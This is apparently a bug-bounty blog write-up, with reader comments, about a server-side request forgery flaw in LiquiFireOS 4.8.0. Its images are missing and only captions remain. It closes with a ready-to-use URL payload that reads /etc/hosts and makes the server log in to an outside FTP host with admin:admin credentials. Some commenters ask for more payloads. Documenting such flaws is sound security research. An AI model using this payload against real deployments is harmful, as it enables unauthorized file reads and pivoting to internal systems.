sobota, 28 grudnia 2019

Testing SSRF in LiquiFireOS

During one bugbounty I found that the target webapp is presenting some 'interesting errors' in responses. ;) As this is always a nice and cool 'hint' to see during pentests/ctfs I decided to dig a little bit more. Below you will find the details for SSRF found in LiquiFireOS. Here we go...

Today we'll start here:


This solutions was 'something new' for me. Example response I found online during bugbounty:
 
 
I decided to use Burp Suite and try few of the scenarios described in one of the posts available on the blog:


Few more cases (and sample response):



So it looks like we're talking about version 4.8.0 :) Cool, next:

As you can see (example requests from Intruder) there is a nice part of the link, for example url.
I decided to check some other 'url' :) Results below:


That looks interesting ;> So what is the problem? Maybe the port? Maybe the hostname? I will try to change both of them:



That's nice :) Is there any other parameter available for this kind of modification?


To verify it I decided to read a very nice book for Christmas - called the manual: ;)


You can find few more cool cases and examples there.

As I saw in one of the error messages, there are only 4 possibilities to use: http://, ftp://, file:// and cms://. I decided to use http and ftp:

Nice response. ;)

I decided to check if the target app will be able to do something else for me. For example to log in to some (internal?;)) ftp server. Because I do not have one (in the 'target/bugbounty company' ;)) I decided to use some nice-for-cats-ftp server I found online. Let's try to log in with admin:admin credentials:


Looks promising ;)

If you will see the main page ('of the target') there should be something like this:


Sample payload to use in your URL:
"%3Fset%3Dsource[/etc/hosts]%2Corigin[/etc/]%2Ccategory[2]%2Ctype[DESCRIPTIVESTILLLIFE]%2Chmver[3]%26call%3Durl[ftp:%2f%2fadmin:admin@xxxxxxxxx.pl/]"

Maybe you'll find it useful.

See you next time!

Cheers




7 komentarzy:

  1. hi,
    do you still have the user manual of liquidfire os ? i can't find it anywhere. need it for a securtity bug.

    OdpowiedzUsuń
  2. hi, unfortunately - no. but I believe you'll find some hints and answers at their webpage: knowledge,liquidpixels,com. hope that helps. :)

    thanks for watching ;)

    cheers

    OdpowiedzUsuń
  3. Hey I Escalated this to critical,I only reported it to one program, can not found lot of websites running this

    OdpowiedzUsuń
  4. I found many webpage has this error but I need more payloads.

    OdpowiedzUsuń
    Odpowiedzi
    1. Cool. I believe you already informed the author(s) ;) so now probably it's a good time to talk directly with the vendor about the exploitation scenarios and your other ideas.

      I can help only with legal project/research.

      Thanks for watching.

      Cheers

      Usuń
  5. Any resources regarding escalation to Critical ?

    OdpowiedzUsuń
    Odpowiedzi
    1. Hi,

      thanks for watching. I appreciate it. ;)

      Answering: I did not dig deeper for this bug.
      Probably a good idea is to check and/or ask the vendor directly: https;// iquidpixels, com

      Cheers

      Usuń